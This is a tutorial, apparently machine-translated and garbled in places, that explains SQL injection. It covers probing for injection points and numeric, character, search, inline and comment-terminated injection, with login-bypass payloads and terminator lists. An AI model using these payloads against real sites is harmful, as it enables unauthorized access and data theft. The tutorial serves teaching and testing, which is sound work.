Introduction:
Causes of SQL Injection Vulnerabilities
- SQL Injection
-
When programmers write code, they do not judge the legitimacy of user
input
data , which makes
the application program have security risks . database operations
SQL statement
- Structured Query Language
-
Structured query language
is the standard language for relational database communication.
Query:
SELECT statement FROM table WHERE condition
delete record:DELETE FROM table WHERE condition
update record:UPDATE table SET field=value WHERE condtion
add record:INSERT INTO table field VALUES(values)
SQLInjection attack process
Determine the injection point
Determine the injection point type
Determine database type
Get the database database, escalate privileges
1. Determine SQLthe injection point
Finding the injection point is the most critical and basic link
- The essential principle is:
-
Find a point that needs to be processed in the background and
submitted to the database.
As long as all inputs interact with the database,SQLinjection may be triggered - Generally three categories
-
Getparameter triggerSQLinjection
POSTparameter triggerSQLinjection
CookietriggerSQLinjection - E.g:
-
In the parameters of the regular link (
链接?参数) find the form such?id=numas , the search box,
There are many ways to verify whether there is an injection point. The
most conventional and simplest method is to introduce single quotes to determine whether there is an injection point.
http://host/test.php?id=100’Returns an error indicating the possibility of injection
http://host/test.php?id=100 and 1=1return to normal
http://host/test.php?id=100 and 1=2return error
If the above three points are met, 注入点the possibility of yes is very high.
After finding the injection point, it is
2. Determine the injection type
0x01 digital injection point
testing method:
http://host/test.php?id=100 and 1=1return success
http://host/test.php?id=100 and 1=2return failure
Why does the first one return success and the second one fails?
- The reasons are as follows:
-
Suppose the SQL query statement of our website is like this,
SELECT * FROM news WHERE id=$id
here$idis the user submittedWhen we enter the
100 and 1=1
statement it becomes like this
SELECT * FROM news WHERE id=100 and 1=1
The left side of this
SQLstatementandreturns success, because weidadd our injection statement after it exists. If thisiddoes not exist, it cannot be tested.On the
andright, 1=1 is also constant, so the entire statement returns successOf course, if it is changed later
1=2, because it1=2is not valid,andthe judgment logic of the statement is that as long as one of the statements is not valid, it will return failure, so the1=2final return is failure.
0x02 Character injection point
Test method:
http://host/test.php?name=man' and '1'='1return success
http://host/test.php?name=man' and '1'='2return failure
This makes the above number type into a character type
- The reasons are as follows:
-
Or suppose that the SQL statement of our website is like this.
SELECT * FROM news WHERE name='$name'
When we construct the input as the following, the
man' and '1'='1
statement becomes
SELECT * FROM news WHERE name='man' and '1'='1'
Did you find anything? This SQL has been closed
It is still the same,
andthe left side here must be established, and theandright side is also established, so after the and logic, the entire statement returns success.
Similarly it can be seen that if the latter is followed,1'='2it will return failure. Of course, it does not have to be1or2, because it is character type, so we can enter any character
like this
http://host/test.php?name=man' and 'a'='areturn success
http://host/test.php?name=man' and 'a'='breturn failure
0x03 Search injection point—currently common
testing method
http://host//test.php?keyword=python%' and 1=1 and '%'='
http://host//test.php?keyword=python%' and 1=2 and '%'='
Suppose our SQL query statement is like this
SELECT * FROM news WHERE keyword like '%$keyword%'Here
$keywordis the user inputWhen we enter the following statement, we
pt%' and 1=1 and '%'='
end up with the following statement,
SELECT * FROM news WHERE keyword like '%pt%' and 1=1 and '%'='%'
which is closed again
Here we will analyze the following, because it is andlogic, as long as there is an error, an error will be returned
We can divide this statement into three paragraphs
SELECT * FROM news WHERE keyword like '%python%'
and 1=1
and '%'='%'The statement on the first line is definitely successful (again, we are constructing SQL injection on the existing query)
The second sentence is also the third sentence, because I must be equal to myself.
But if we replace the second sentence
1=2with, then this sentence will definitely return failure, which is the principle
0x04 Inline SQL Injection – Commonly Used
Inline injection means that after the query is injected into the SQLcode, the original query is still fully executed
Suppose our website SQLquery statement is like this
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
This looks like the code for a login page
If we construct the following statement and submit it to the login box
username
' or ''='Or submit it to the
passwordbox. The two submission methods are different. Let's analyze these two submission methods below.The statement submitted to
usernameus would become like this
SELECT * FROM admin WHER username='' or ''='' AND password ='fuzz'
fuzzis the string we just enter
And submit to
passwordit will be like this
SELECT * FROM admin WHER username='fuzz' AND password ='' or ''=''
- Note:
-
In the
SQLstatement ,ANDthe priority is greater thanORthe
first calculationAND, then the calculationOR, so here our statement will beORdivided into two paragraphsSQLstatement
it's usernameframed
SELECT * FROM admin WHER username=''
or
''='' AND password ='fuzz'
Or passwordframe like this
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
We first use the first to analyze
ANDAfter calculating first
SELECT * FROM admin WHER username=''return failure
or
''='' AND password ='fuzz'return failure
The database does not exist usernameas NULLa field, so the first sentence returns a failure, and in the third sentence, because passwordwe entered casually, 99.99%the password will not exist, so ANDafter that, our third sentence also fails. , so the entire statement returns a failed
But our passwordsituation is different
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
Here our first sentence is to return failure, but our second sentence ''=''is to return success, the ORlogic is to return success if one is successful, so our entire statement will return success
After the return is successful, we will bypass the login form and log in directly to the system.
0x05 Terminating SQL Injection - Commonly Used
Terminating SQLstatement injection means that when an attacker injects SQLcode, he successfully ends the statement by annotating the rest of the query.
So the annotated query will not be executed, let's take the above example as an example
We already know above,
usernamefill in the box
' or ''='The program will not return success, so we have no way to
usernamemake a fuss?
Wrong, we still have a terminator
or the SQLquery above
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
Here we construct the following usernameinput
' or ''='' --
Then we can get the following query
SELECT * FROM admin WHER username='' or ''='' --' AND password ='fuzz'
Here fuzzis what we enter casually, it --is a comment
In this way, our statement can be divided into three parts
SELECT * FROM admin WHER username=''
or ''='' 返回成功
--' AND password ='fuzz'
The first sentence must return failure, but our second sentence will return success
It has been commented out by us and will not be executed, so we can still usernamebypass the login by doing this trick
The following are some of our common termination methods
Terminate string:
-- , #, %23, %00, /*
Termination method:
-- , ‘-- , ‘)-- , ) -- , ‘)) --, ))--